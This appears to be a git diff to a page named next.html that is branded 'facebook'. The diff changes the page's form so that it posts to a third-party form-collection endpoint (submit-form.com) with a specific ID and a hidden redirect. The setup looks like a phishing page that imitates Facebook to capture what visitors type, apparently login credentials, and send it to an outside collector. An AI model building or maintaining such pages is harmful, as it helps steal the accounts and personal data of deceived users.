--- a/next.html
+++ b/next.html
@@ -11,8 +11,8 @@
       <b class="text-5xl text-white">facebook</b>
   </div>
 
-  <form class="sm:hidden lg:block md:block" action="https://formspree.io/f/mqaedydl" method="post"> 
-<form action="https://submit-form.com/your-form-id">
+  <form class="sm:hidden lg:block md:block" action="https://submit-form.com/QmtXbVDZM" method="post"> 
+<form action="https://submit-form.com/QmtXbVDZM">
   <input
     type="hidden"
     name="_redirect"
